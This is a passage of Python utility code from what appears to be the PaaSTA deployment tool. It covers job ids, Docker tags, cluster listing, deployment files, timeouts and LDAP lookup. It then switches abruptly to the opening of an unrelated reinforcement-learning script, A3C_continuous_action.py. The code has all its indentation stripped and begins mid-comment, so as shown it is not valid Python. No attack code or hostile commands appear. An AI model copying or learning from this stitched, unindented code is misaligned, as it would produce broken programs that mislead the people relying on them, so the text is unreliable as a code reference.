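# the block exits, so readers never observe a partially written file. Passing
# "-" writes to stdout instead.
#
#     with atomic_file_write("/tmp/report.txt") as f:
#         f.write("all done\n")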
class InvalidJobNameError(Exception):
pass
def compose_job_id(
name: str,
instance: str,
git_hash: Optional[str] = None,
config_hash: Optional[str] = None,
spacer: str = SPACER,
) -> str:
"""Compose a job/app id by concatenating its name, instance, git hash, and config hash.
:param name: The name of the service
:param instance: The instance of the service
:param git_hash: The git_hash portion of the job_id. If git_hash is set,
config_hash must also be set.
:param config_hash: The config_hash portion of the job_id. If config_hash
is set, git_hash must also be set.
:returns: <name><SPACER><instance> if no tag, or <name><SPACER><instance><SPACER><hashes>...
if extra hash inputs are provided.
"""
composed = f"{name}{spacer}{instance}"
if git_hash and config_hash:
composed = f"{composed}{spacer}{git_hash}{spacer}{config_hash}"
elif git_hash or config_hash:
raise InvalidJobNameError(
"invalid job id because git_hash (%s) and config_hash (%s) must "
"both be defined or neither can be defined" % (git_hash, config_hash)
)
return composed
def decompose_job_id(job_id: str, spacer: str = SPACER) -> Tuple[str, str, str, str]:
"""Break a composed job id into its constituent (service name, instance,
git hash, config hash) by splitting with ``spacer``.
:param job_id: The composed id of the job/app
:returns: A tuple (service name, instance, git hash, config hash) that
comprise the job_id
"""
decomposed = job_id.split(spacer)
if len(decomposed) == 2:
git_hash = None
config_hash = None
elif len(decomposed) == 4:
git_hash = decomposed[2]
config_hash = decomposed[3]
else:
raise InvalidJobNameError("invalid job id %s" % job_id)
return (decomposed[0], decomposed[1], git_hash, config_hash)
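# Round-trip sketch, assuming the module-level SPACER is "." (the values here
# are illustrative only):
#
#     compose_job_id("myservice", "main", "gitdeadbeef", "configabcdef12")
#     # -> "myservice.main.gitdeadbeef.configabcdef12"
#     decompose_job_id("myservice.main.gitdeadbeef.configabcdef12")
#     # -> ("myservice", "main", "gitdeadbeef", "configabcdef12")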
def build_docker_image_name(service: str) -> str:
"""docker-paasta.yelpcorp.com:443 is the URL for the Registry where PaaSTA
will look for your images.
:returns: a sanitized-for-Jenkins (s,/,-,g) version of the
service's path in git. E.g. For github.yelpcorp.com:services/foo the
docker image name is docker_registry/services-foo.
"""
docker_registry_url = get_service_docker_registry(service)
name = f"{docker_registry_url}/services-{service}"
return name
def build_docker_tag(service: str, upstream_git_commit: str) -> str:
"""Builds the DOCKER_TAG string
upstream_git_commit is the SHA that we're building. Usually this is the
tip of origin/master.
"""
tag = "{}:paasta-{}".format(build_docker_image_name(service), upstream_git_commit)
return tag
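# Example of the resulting tag, assuming the service's registry resolves to the
# default docker-paasta.yelpcorp.com:443 registry mentioned above:
#
#     build_docker_tag("foo", "0123abcd")
#     # -> "docker-paasta.yelpcorp.com:443/services-foo:paasta-0123abcd"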
def check_docker_image(service: str, tag: str) -> bool:
"""Checks whether the given image for :service: with :tag: exists.
:raises: ValueError if more than one docker image with :tag: found.
:returns: True if there is exactly one matching image found.
"""
docker_client = get_docker_client()
image_name = build_docker_image_name(service)
docker_tag = build_docker_tag(service, tag)
images = docker_client.images(name=image_name)
# image['RepoTags'] may be None
# Fixed upstream but only in docker-py 2.
# https://github.com/docker/docker-py/issues/1401
result = [image for image in images if docker_tag in (image["RepoTags"] or [])]
if len(result) > 1:
raise ValueError(
f"More than one docker image found with tag {docker_tag}\n{result}"
)
return len(result) == 1
def datetime_from_utc_to_local(utc_datetime: datetime.datetime) -> datetime.datetime:
return datetime_convert_timezone(
utc_datetime, dateutil.tz.tzutc(), dateutil.tz.tzlocal()
)
def datetime_convert_timezone(
dt: datetime.datetime, from_zone: datetime.tzinfo, to_zone: datetime.tzinfo
) -> datetime.datetime:
dt = dt.replace(tzinfo=from_zone)
converted_datetime = dt.astimezone(to_zone)
converted_datetime = converted_datetime.replace(tzinfo=None)
return converted_datetime
def get_username() -> str:
"""Returns the current username in a portable way. Will use the SUDO_USER
environment variable if present.
http://stackoverflow.com/a/2899055
"""
return os.environ.get("SUDO_USER", pwd.getpwuid(os.getuid())[0])
def get_hostname() -> str:
"""Returns the fully-qualified domain name of the server this code is
running on.
"""
return socket.getfqdn()
def get_soa_cluster_deploy_files(
service: str = None, soa_dir: str = DEFAULT_SOA_DIR, instance_type: str = None
) -> Iterator[Tuple[str, str]]:
if service is None:
service = "*"
service_path = os.path.join(soa_dir, service)
valid_clusters = "|".join(load_system_paasta_config().get_clusters())
if instance_type in INSTANCE_TYPES:
instance_types = instance_type
else:
instance_types = "|".join(INSTANCE_TYPES)
search_re = r"/.*/(" + instance_types + r")-(" + valid_clusters + r")\.yaml$"
for yaml_file in glob.glob("%s/*.yaml" % service_path):
try:
with open(yaml_file):
cluster_re_match = re.search(search_re, yaml_file)
if cluster_re_match is not None:
cluster = cluster_re_match.group(2)
yield (cluster, yaml_file)
except IOError as err:
print(f"Error opening {yaml_file}: {err}")
def list_clusters(
service: str = None, soa_dir: str = DEFAULT_SOA_DIR, instance_type: str = None
) -> List[str]:
"""Returns a sorted list of clusters a service is configured to deploy to,
or all clusters if ``service`` is not specified.
Includes every cluster that has a ``marathon-*.yaml`` or ``tron-*.yaml`` file associated with it.
:param service: The service name. If unspecified, clusters running any service will be included.
:returns: A sorted list of cluster names
"""
clusters = set()
for cluster, _ in get_soa_cluster_deploy_files(
service=service, soa_dir=soa_dir, instance_type=instance_type
):
clusters.add(cluster)
return sorted(clusters)
def list_all_instances_for_service(
service: str,
clusters: Iterable[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
cache: bool = True,
) -> Set[str]:
instances = set()
if not clusters:
clusters = list_clusters(service, soa_dir=soa_dir)
for cluster in clusters:
if cache:
si_list = get_service_instance_list(
service, cluster, instance_type, soa_dir=soa_dir
)
else:
si_list = get_service_instance_list_no_cache(
service, cluster, instance_type, soa_dir=soa_dir
)
for service_instance in si_list:
instances.add(service_instance[1])
return instances
def filter_templates_from_config(config: Dict) -> Dict[str, Any]:
config = {
key: value for key, value in config.items() if not key.startswith("_")
} # filter templates
return config or {}
def read_service_instance_names(
service: str, instance_type: str, cluster: str, soa_dir: str
) -> Collection[Tuple[str, str]]:
instance_list = []
conf_file = f"{instance_type}-{cluster}"
config = service_configuration_lib.read_extra_service_information(
service, conf_file, soa_dir=soa_dir, deepcopy=False,
)
config = filter_templates_from_config(config)
if instance_type == "tron":
for job_name, job in config.items():
action_names = list(job.get("actions", {}).keys())
for name in action_names:
instance = f"{job_name}.{name}"
instance_list.append((service, instance))
else:
for instance in config:
instance_list.append((service, instance))
return instance_list
def get_pipeline_config(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> List[Dict]:
service_configuration = read_service_configuration(service, soa_dir)
return service_configuration.get("deploy", {}).get("pipeline", [])
def get_pipeline_deploy_groups(
service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> List[str]:
pipeline_steps = []
for step in get_pipeline_config(service, soa_dir):
        # added support for parallel steps in a deploy.yaml;
        # parallel steps would break previous functionality, as steps aren't
        # expected to be nested in a parallel block
if step.get("parallel"):
for parallel_step in step.get("parallel"):
if parallel_step.get("step"):
pipeline_steps.append(parallel_step["step"])
else:
pipeline_steps.append(step["step"])
return [step for step in pipeline_steps if is_deploy_step(step)]
def get_service_instance_list_no_cache(
service: str,
cluster: Optional[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
) -> List[Tuple[str, str]]:
"""Enumerate the instances defined for a service as a list of tuples.
:param service: The service name
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (name, instance) for each instance defined for the service name
"""
instance_types: Tuple[str, ...]
if not cluster:
cluster = load_system_paasta_config().get_cluster()
if instance_type in INSTANCE_TYPES:
instance_types = (instance_type,)
else:
instance_types = INSTANCE_TYPES
instance_list: List[Tuple[str, str]] = []
for srv_instance_type in instance_types:
instance_list.extend(
read_service_instance_names(
service=service,
instance_type=srv_instance_type,
cluster=cluster,
soa_dir=soa_dir,
)
)
log.debug("Enumerated the following instances: %s", instance_list)
return instance_list
@time_cache(ttl=5)
def get_service_instance_list(
service: str,
cluster: Optional[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
) -> List[Tuple[str, str]]:
"""Enumerate the instances defined for a service as a list of tuples.
:param service: The service name
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (name, instance) for each instance defined for the service name
"""
return get_service_instance_list_no_cache(
service=service, cluster=cluster, instance_type=instance_type, soa_dir=soa_dir
)
def get_services_for_cluster(
cluster: str = None, instance_type: str = None, soa_dir: str = DEFAULT_SOA_DIR
) -> List[Tuple[str, str]]:
"""Retrieve all services and instances defined to run in a cluster.
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (service, instance)
"""
if not cluster:
cluster = load_system_paasta_config().get_cluster()
rootdir = os.path.abspath(soa_dir)
log.debug(
"Retrieving all service instance names from %s for cluster %s", rootdir, cluster
)
instance_list: List[Tuple[str, str]] = []
for srv_dir in os.listdir(rootdir):
instance_list.extend(
get_service_instance_list(srv_dir, cluster, instance_type, soa_dir)
)
return instance_list
def load_service_instance_configs(
service: str, instance_type: str, cluster: str, soa_dir: str = DEFAULT_SOA_DIR,
) -> Dict[str, InstanceConfigDict]:
conf_file = f"{instance_type}-{cluster}"
user_configs = service_configuration_lib.read_extra_service_information(
service, conf_file, soa_dir=soa_dir, deepcopy=False,
)
user_configs = filter_templates_from_config(user_configs)
auto_configs = load_service_instance_auto_configs(
service, instance_type, cluster, soa_dir
)
merged = {}
for instance_name, user_config in user_configs.items():
auto_config = auto_configs.get(instance_name, {})
merged[instance_name] = deep_merge_dictionaries(
overrides=user_config, defaults=auto_config,
)
return merged
def load_service_instance_config(
service: str,
instance: str,
instance_type: str,
cluster: str,
soa_dir: str = DEFAULT_SOA_DIR,
) -> InstanceConfigDict:
if instance.startswith("_"):
raise InvalidJobNameError(
f"Unable to load {instance_type} config for {service}.{instance} as instance name starts with '_'"
)
conf_file = f"{instance_type}-{cluster}"
# We pass deepcopy=False here and then do our own deepcopy of the subset of the data we actually care about. Without
# this optimization, any code that calls load_service_instance_config for every instance in a yaml file is ~O(n^2).
user_config = copy.deepcopy(
service_configuration_lib.read_extra_service_information(
service, conf_file, soa_dir=soa_dir, deepcopy=False
).get(instance)
)
if user_config is None:
raise NoConfigurationForServiceError(
f"{instance} not found in config file {soa_dir}/{service}/{conf_file}.yaml."
)
auto_config = load_service_instance_auto_configs(
service, instance_type, cluster, soa_dir
).get(instance, {})
return deep_merge_dictionaries(overrides=user_config, defaults=auto_config,)
def load_service_instance_auto_configs(
service: str, instance_type: str, cluster: str, soa_dir: str = DEFAULT_SOA_DIR,
) -> Dict[str, Dict[str, Any]]:
enabled_types = load_system_paasta_config().get_auto_config_instance_types_enabled()
conf_file = f"{instance_type}-{cluster}"
if enabled_types.get(instance_type):
return service_configuration_lib.read_extra_service_information(
service,
f"{AUTO_SOACONFIG_SUBDIR}/{conf_file}",
soa_dir=soa_dir,
deepcopy=False,
)
else:
return {}
def get_docker_host() -> str:
return os.environ.get("DOCKER_HOST", "unix://var/run/docker.sock")
def get_docker_client() -> Client:
client_opts = kwargs_from_env(assert_hostname=False)
if "base_url" in client_opts:
return Client(**client_opts)
else:
return Client(base_url=get_docker_host(), **client_opts)
def get_running_mesos_docker_containers() -> List[Dict]:
client = get_docker_client()
running_containers = client.containers()
return [
container
for container in running_containers
if "mesos-" in container["Names"][0]
]
class TimeoutError(Exception):
pass
class Timeout:
# From http://stackoverflow.com/questions/2281850/timeout-function-if-it-takes-too-long-to-finish
def __init__(self, seconds: int = 1, error_message: str = "Timeout") -> None:
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum: int, frame: FrameType) -> None:
raise TimeoutError(self.error_message)
def __enter__(self) -> None:
self.old_handler = signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type: Any, value: Any, traceback: Any) -> None:
signal.alarm(0)
signal.signal(signal.SIGALRM, self.old_handler)
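# Usage sketch: the body is interrupted with TimeoutError if it runs longer
# than `seconds`. This relies on SIGALRM, so it only works in the main thread.
#
#     with Timeout(seconds=5, error_message="too slow"):
#         do_something_slow()  # hypothetical long-running call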
def print_with_indent(line: str, indent: int = 2) -> None:
"""Print a line with a given indent level"""
print(" " * indent + line)
class NoDeploymentsAvailable(Exception):
pass
DeploymentsJsonV1Dict = Dict[str, BranchDictV1]
DeployGroup = str
BranchName = str
class _DeploymentsJsonV2ControlsDict(TypedDict, total=False):
force_bounce: Optional[str]
desired_state: str
class _DeploymentsJsonV2DeploymentsDict(TypedDict):
docker_image: str
git_sha: str
class DeploymentsJsonV2Dict(TypedDict):
deployments: Dict[DeployGroup, _DeploymentsJsonV2DeploymentsDict]
controls: Dict[BranchName, _DeploymentsJsonV2ControlsDict]
class DeploymentsJsonDict(TypedDict):
v1: DeploymentsJsonV1Dict
v2: DeploymentsJsonV2Dict
class DeploymentsJsonV1:
def __init__(self, config_dict: DeploymentsJsonV1Dict) -> None:
self.config_dict = config_dict
def get_branch_dict(self, service: str, branch: str) -> BranchDictV1:
full_branch = f"{service}:paasta-{branch}"
return self.config_dict.get(full_branch, {})
def __eq__(self, other: Any) -> bool:
return (
isinstance(other, DeploymentsJsonV1)
and other.config_dict == self.config_dict
)
class DeploymentsJsonV2:
def __init__(self, service: str, config_dict: DeploymentsJsonV2Dict) -> None:
self.config_dict = config_dict
self.service = service
def get_branch_dict(
self, service: str, branch: str, deploy_group: str
) -> BranchDictV2:
full_branch = f"{service}:{branch}"
branch_dict: BranchDictV2 = {
"docker_image": self.get_docker_image_for_deploy_group(deploy_group),
"git_sha": self.get_git_sha_for_deploy_group(deploy_group),
"desired_state": self.get_desired_state_for_branch(full_branch),
"force_bounce": self.get_force_bounce_for_branch(full_branch),
}
return branch_dict
def get_deploy_groups(self) -> Collection[str]:
return self.config_dict["deployments"].keys()
def get_docker_image_for_deploy_group(self, deploy_group: str) -> str:
try:
return self.config_dict["deployments"][deploy_group]["docker_image"]
except KeyError:
e = f"{self.service} not deployed to {deploy_group}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_git_sha_for_deploy_group(self, deploy_group: str) -> str:
try:
return self.config_dict["deployments"][deploy_group]["git_sha"]
except KeyError:
e = f"{self.service} not deployed to {deploy_group}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_desired_state_for_branch(self, control_branch: str) -> str:
try:
return self.config_dict["controls"][control_branch].get(
"desired_state", "start"
)
except KeyError:
e = f"{self.service} not configured for {control_branch}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_force_bounce_for_branch(self, control_branch: str) -> str:
try:
return self.config_dict["controls"][control_branch].get(
"force_bounce", None
)
except KeyError:
e = f"{self.service} not configured for {control_branch}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def load_deployments_json(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> Any:
deployment_file = os.path.join(soa_dir, service, "deployments.json")
if os.path.isfile(deployment_file):
with open(deployment_file) as f:
config_dict = json.load(f)
return (
DeploymentsJsonV1(config_dict["v1"])
if "v1" in config_dict
else DeploymentsJsonV2(service=service, config_dict=config_dict["v2"])
)
else:
e = f"{deployment_file} was not found. 'generate_deployments_for_service --service {service}' must be run first"
raise NoDeploymentsAvailable(e)
def load_v2_deployments_json(
service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> DeploymentsJsonV2:
deployment_file = os.path.join(soa_dir, service, "deployments.json")
if os.path.isfile(deployment_file):
with open(deployment_file) as f:
return DeploymentsJsonV2(service=service, config_dict=json.load(f)["v2"])
else:
e = f"{deployment_file} was not found. 'generate_deployments_for_service --service {service}' must be run first"
raise NoDeploymentsAvailable(e)
def get_paasta_branch(cluster: str, instance: str) -> str:
return SPACER.join((cluster, instance))
def parse_timestamp(tstamp: str) -> datetime.datetime:
return datetime.datetime.strptime(tstamp, "%Y%m%dT%H%M%S")
def format_timestamp(dt: datetime.datetime = None) -> str:
if dt is None:
dt = datetime.datetime.utcnow()
return dt.strftime("%Y%m%dT%H%M%S")
def get_paasta_tag_from_deploy_group(identifier: str, desired_state: str) -> str:
timestamp = format_timestamp(datetime.datetime.utcnow())
return f"paasta-{identifier}-{timestamp}-{desired_state}"
def get_paasta_tag(cluster: str, instance: str, desired_state: str) -> str:
timestamp = format_timestamp(datetime.datetime.utcnow())
return f"paasta-{cluster}.{instance}-{timestamp}-{desired_state}"
def format_tag(tag: str) -> str:
return "refs/tags/%s" % tag
class NoDockerImageError(Exception):
pass
def get_config_hash(config: Any, force_bounce: str = None) -> str:
"""Create an MD5 hash of the configuration dictionary to be sent to
Marathon. Or anything really, so long as str(config) works. Returns
the first 8 characters so things are not really long.
:param config: The configuration to hash
:param force_bounce: a timestamp (in the form of a string) that is appended before hashing
that can be used to force a hash change
:returns: A MD5 hash of str(config)
"""
hasher = hashlib.md5()
hasher.update(
json.dumps(config, sort_keys=True).encode("UTF-8")
+ (force_bounce or "").encode("UTF-8")
)
return "config%s" % hasher.hexdigest()[:8]
def get_git_sha_from_dockerurl(docker_url: str, long: bool = False) -> str:
""" We encode the sha of the code that built a docker image *in* the docker
url. This function takes that url as input and outputs the sha.
"""
parts = docker_url.split("/")
parts = parts[-1].split("-")
sha = parts[-1]
return sha if long else sha[:8]
def get_code_sha_from_dockerurl(docker_url: str) -> str:
""" code_sha is hash extracted from docker url prefixed with "git", short
hash is used because it's embedded in marathon app names and there's length
limit.
"""
try:
git_sha = get_git_sha_from_dockerurl(docker_url, long=False)
return "git%s" % git_sha
except Exception:
return "gitUNKNOWN"
def is_under_replicated(
num_available: int, expected_count: int, crit_threshold: int
) -> Tuple[bool, float]:
"""Calculates if something is under replicated
:param num_available: How many things are up
:param expected_count: How many things you think should be up
:param crit_threshold: Int from 0-100
:returns: Tuple of (bool, ratio)
"""
if expected_count == 0:
ratio = 100.0
else:
ratio = (num_available / float(expected_count)) * 100
if ratio < int(crit_threshold):
return (True, ratio)
else:
return (False, ratio)
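# Worked example: 3 of 4 expected instances up, with a 75% critical threshold.
# The ratio is exactly 75.0, and since the check is strictly less-than, this is
# not considered under-replicated.
#
#     is_under_replicated(num_available=3, expected_count=4, crit_threshold=75)
#     # -> (False, 75.0)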
def deploy_blacklist_to_constraints(
deploy_blacklist: DeployBlacklist,
) -> List[Constraint]:
"""Converts a blacklist of locations into marathon appropriate constraints.
https://mesosphere.github.io/marathon/docs/constraints.html#unlike-operator
    :param deploy_blacklist: List of lists of locations to blacklist
:returns: List of lists of constraints
"""
constraints: List[Constraint] = []
for blacklisted_location in deploy_blacklist:
constraints.append([blacklisted_location[0], "UNLIKE", blacklisted_location[1]])
return constraints
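# Illustrative conversion (the location values are made up):
#
#     deploy_blacklist_to_constraints([["region", "uswest1-prod"]])
#     # -> [["region", "UNLIKE", "uswest1-prod"]]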
def deploy_whitelist_to_constraints(
deploy_whitelist: DeployWhitelist,
) -> List[Constraint]:
"""Converts a whitelist of locations into marathon appropriate constraints
https://mesosphere.github.io/marathon/docs/constraints.html#like-operator
:param deploy_whitelist: List of lists of locations to whitelist
:returns: List of lists of constraints
"""
if deploy_whitelist is not None:
(region_type, regions) = deploy_whitelist
regionstr = "|".join(regions)
return [[region_type, "LIKE", regionstr]]
return []
def terminal_len(text: str) -> int:
"""Return the number of characters that text will take up on a terminal. """
return len(remove_ansi_escape_sequences(text))
def format_table(
rows: Iterable[Union[str, Sequence[str]]], min_spacing: int = 2
) -> List[str]:
"""Formats a table for use on the command line.
:param rows: List of rows, each of which can either be a tuple of strings containing the row's values, or a string
to be inserted verbatim. Each row (except literal strings) should be the same number of elements as
all the others.
    :returns: A list of strings, one per row, formatted as a table.
"""
list_rows = [r for r in rows if not isinstance(r, str)]
# If all of the rows are strings, we have nothing to do, so short-circuit.
if not list_rows:
return cast(List[str], rows)
widths = []
for i in range(len(list_rows[0])):
widths.append(max(terminal_len(r[i]) for r in list_rows))
expanded_rows = []
for row in rows:
if isinstance(row, str):
expanded_rows.append([row])
else:
expanded_row = []
for i, cell in enumerate(row):
if i == len(row) - 1:
padding = ""
else:
padding = " " * (widths[i] - terminal_len(cell))
expanded_row.append(cell + padding)
expanded_rows.append(expanded_row)
return [(" " * min_spacing).join(r) for r in expanded_rows]
_DeepMergeT = TypeVar("_DeepMergeT", bound=Any)
class DuplicateKeyError(Exception):
pass
def deep_merge_dictionaries(
overrides: _DeepMergeT, defaults: _DeepMergeT, allow_duplicate_keys: bool = True
) -> _DeepMergeT:
"""
Merges two dictionaries.
"""
result = copy.deepcopy(defaults)
stack: List[Tuple[Dict, Dict]] = [(overrides, result)]
while stack:
source_dict, result_dict = stack.pop()
for key, value in source_dict.items():
try:
child = result_dict[key]
except KeyError:
result_dict[key] = value
else:
if isinstance(value, dict) and isinstance(child, dict):
stack.append((value, child))
else:
if allow_duplicate_keys:
result_dict[key] = value
else:
raise DuplicateKeyError(
f"defaults and overrides both have key {key}"
)
return result
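# Sketch of the merge semantics: nested dicts are merged recursively, and on a
# conflict the value from `overrides` wins (unless allow_duplicate_keys=False,
# in which case DuplicateKeyError is raised).
#
#     deep_merge_dictionaries(
#         overrides={"env": {"A": "1"}, "cpus": 1},
#         defaults={"env": {"B": "2"}, "cpus": 0.25, "mem": 300},
#     )
#     # -> {"env": {"A": "1", "B": "2"}, "cpus": 1, "mem": 300}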
class ZookeeperPool:
"""
A context manager that shares the same KazooClient with its children. The first nested context manager
    creates and deletes the client and shares it with any of its children. This allows placing a context
    manager over a large number of zookeeper calls without opening and closing a connection each time.
GIL makes this 'safe'.
"""
counter: int = 0
zk: KazooClient = None
@classmethod
def __enter__(cls) -> KazooClient:
if cls.zk is None:
cls.zk = KazooClient(
hosts=load_system_paasta_config().get_zk_hosts(), read_only=True
)
cls.zk.start()
cls.counter = cls.counter + 1
return cls.zk
@classmethod
def __exit__(cls, *args: Any, **kwargs: Any) -> None:
cls.counter = cls.counter - 1
if cls.counter == 0:
cls.zk.stop()
cls.zk.close()
cls.zk = None
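# Usage sketch (the znode path is a placeholder): nested `with` blocks share a
# single read-only KazooClient; the connection is only closed when the
# outermost block exits.
#
#     with ZookeeperPool() as zk:
#         children = zk.get_children("/some/path")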
def calculate_tail_lines(verbose_level: int) -> int:
if verbose_level <= 1:
return 0
else:
return 10 ** (verbose_level - 1)
def is_deploy_step(step: str) -> bool:
"""
    Returns True if the given step deploys to an instance name.
    Returns False if the step is a predefined step type, e.g. itest or command-*
"""
return not (
(step in DEPLOY_PIPELINE_NON_DEPLOY_STEPS) or (step.startswith("command-"))
)
_UseRequestsCacheFuncT = TypeVar("_UseRequestsCacheFuncT", bound=Callable)
def use_requests_cache(
cache_name: str, backend: str = "memory", **kwargs: Any
) -> Callable[[_UseRequestsCacheFuncT], _UseRequestsCacheFuncT]:
def wrap(fun: _UseRequestsCacheFuncT) -> _UseRequestsCacheFuncT:
def fun_with_cache(*args: Any, **kwargs: Any) -> Any:
requests_cache.install_cache(cache_name, backend=backend, **kwargs)
result = fun(*args, **kwargs)
requests_cache.uninstall_cache()
return result
return cast(_UseRequestsCacheFuncT, fun_with_cache)
return wrap
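# Usage sketch (the cache name and wrapped function are hypothetical): a
# requests_cache backend is installed for the duration of the call and
# uninstalled afterwards.
#
#     @use_requests_cache("mesos_state", backend="memory")
#     def fetch_state():
#         return requests.get("http://example.com/state").json()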
def long_job_id_to_short_job_id(long_job_id: str) -> str:
service, instance, _, __ = decompose_job_id(long_job_id)
return compose_job_id(service, instance)
def mean(iterable: Collection[float]) -> float:
"""
Returns the average value of an iterable
"""
return sum(iterable) / len(iterable)
def prompt_pick_one(sequence: Collection[str], choosing: str) -> str:
if not sys.stdin.isatty():
print(
"No {choosing} specified and no TTY present to ask."
"Please specify a {choosing} using the cli.".format(choosing=choosing),
file=sys.stderr,
)
sys.exit(1)
if not sequence:
print(
f"PaaSTA needs to pick a {choosing} but none were found.", file=sys.stderr
)
sys.exit(1)
global_actions = [str("quit")]
choices = [(item, item) for item in sequence]
if len(choices) == 1:
return choices[0][0]
chooser = choice.Menu(choices=choices, global_actions=global_actions)
chooser.title = 'Please pick a {choosing} from the choices below (or "quit" to quit):'.format(
choosing=str(choosing)
)
try:
result = chooser.ask()
except (KeyboardInterrupt, EOFError):
print("")
sys.exit(1)
if isinstance(result, tuple) and result[1] == str("quit"):
sys.exit(1)
else:
return result
def to_bytes(obj: Any) -> bytes:
if isinstance(obj, bytes):
return obj
elif isinstance(obj, str):
return obj.encode("UTF-8")
else:
return str(obj).encode("UTF-8")
_TimeoutFuncRetType = TypeVar("_TimeoutFuncRetType")
def timeout(
seconds: int = 10,
error_message: str = os.strerror(errno.ETIME),
use_signals: bool = True,
) -> Callable[[Callable[..., _TimeoutFuncRetType]], Callable[..., _TimeoutFuncRetType]]:
if use_signals:
def decorate(
func: Callable[..., _TimeoutFuncRetType]
) -> Callable[..., _TimeoutFuncRetType]:
def _handle_timeout(signum: int, frame: FrameType) -> None:
raise TimeoutError(error_message)
def wrapper(*args: Any, **kwargs: Any) -> _TimeoutFuncRetType:
signal.signal(signal.SIGALRM, _handle_timeout)
signal.alarm(seconds)
try:
result = func(*args, **kwargs)
finally:
signal.alarm(0)
return result
return wraps(func)(wrapper)
else:
def decorate(
func: Callable[..., _TimeoutFuncRetType]
) -> Callable[..., _TimeoutFuncRetType]:
# https://github.com/python/mypy/issues/797
return _Timeout(func, seconds, error_message) # type: ignore
return decorate
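# Usage sketch: with use_signals=True (the default) the decorated call is
# interrupted via SIGALRM; with use_signals=False it runs in a daemon thread
# via the _Timeout class below.
#
#     @timeout(seconds=30, use_signals=False)
#     def slow_api_call():
#         ...  # hypothetical long-running call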
class _Timeout:
def __init__(
self,
function: Callable[..., _TimeoutFuncRetType],
seconds: float,
error_message: str,
) -> None:
self.seconds = seconds
self.control: queue.Queue[
Tuple[bool, Union[_TimeoutFuncRetType, Tuple]]
] = queue.Queue()
self.function = function
self.error_message = error_message
def run(self, *args: Any, **kwargs: Any) -> None:
# Try and put the result of the function into the q
# if an exception occurs then we put the exc_info instead
# so that it can be raised in the main thread.
try:
self.control.put((True, self.function(*args, **kwargs)))
except Exception:
self.control.put((False, sys.exc_info()))
def __call__(self, *args: Any, **kwargs: Any) -> _TimeoutFuncRetType:
self.func_thread = threading.Thread(target=self.run, args=args, kwargs=kwargs)
self.func_thread.daemon = True
self.timeout = self.seconds + time.time()
self.func_thread.start()
return self.get_and_raise()
def get_and_raise(self) -> _TimeoutFuncRetType:
while not self.timeout < time.time():
time.sleep(0.01)
if not self.func_thread.is_alive():
ret = self.control.get()
if ret[0]:
return cast(_TimeoutFuncRetType, ret[1])
else:
_, e, tb = cast(Tuple, ret[1])
raise e.with_traceback(tb)
raise TimeoutError(self.error_message)
def suggest_possibilities(
word: str, possibilities: Iterable[str], max_suggestions: int = 3
) -> str:
suggestions = cast(
List[str],
difflib.get_close_matches(
word=word, possibilities=set(possibilities), n=max_suggestions
),
)
if len(suggestions) == 1:
return f"\nDid you mean: {suggestions[0]}?"
elif len(suggestions) >= 1:
return f"\nDid you mean one of: {', '.join(suggestions)}?"
else:
return ""
def list_services(soa_dir: str = DEFAULT_SOA_DIR) -> Sequence[str]:
"""Returns a sorted list of all services"""
return sorted(os.listdir(os.path.abspath(soa_dir)))
def get_possible_launched_by_user_variable_from_env() -> str:
return os.getenv("SUDO_USER") or getpass.getuser()
def load_all_configs(
cluster: str, file_prefix: str, soa_dir: str
) -> Mapping[str, Mapping[str, Any]]:
config_dicts = {}
for service in os.listdir(soa_dir):
config_dicts[
service
] = service_configuration_lib.read_extra_service_information(
service, f"{file_prefix}-{cluster}", soa_dir=soa_dir
)
return config_dicts
def ldap_user_search(
cn: str,
search_base: str,
search_ou: str,
ldap_host: str,
username: str,
password: str,
) -> Set[str]:
"""Connects to LDAP and raises a subclass of LDAPOperationResult when it fails"""
tls_config = ldap3.Tls(
validate=ssl.CERT_REQUIRED, ca_certs_file="/etc/ssl/certs/ca-certificates.crt"
)
server = ldap3.Server(ldap_host, use_ssl=True, tls=tls_config)
conn = ldap3.Connection(
server, user=username, password=password, raise_exceptions=True
)
conn.bind()
search_filter = f"(&(memberOf=CN={cn},{search_ou})(!(userAccountControl=514)))"
entries = conn.extend.standard.paged_search(
search_base=search_base,
search_scope=ldap3.SUBTREE,
search_filter=search_filter,
attributes=["sAMAccountName"],
paged_size=1000,
time_limit=10,
)
return {entry["attributes"]["sAMAccountName"] for entry in entries}
def _reorder_docker_volumes(volumes: List[DockerVolume]) -> List[DockerVolume]:
deduped = {
v["containerPath"].rstrip("/") + v["hostPath"].rstrip("/"): v for v in volumes
}.values()
return sort_dicts(deduped)
|
A3C_continuous_action.py
|
"""
Asynchronous Advantage Actor Critic (A3C) with continuous action space, Reinforcement Learning.
The Pendulum example.
View more on my tutorial page: https://morvanzhou.github.io/tutorials/
Using:
tensorflow 1.8.0
gym 0.10.5
"""
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
import matplotlib.pyplot as plt
GAME = 'Pendulum-v0'
OUTPUT_GRAPH = True
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_EP_STEP = 200
MAX_GLOBAL_EP = 2000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.9
ENTROPY_BETA = 0.01
LR_A = 0.0001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
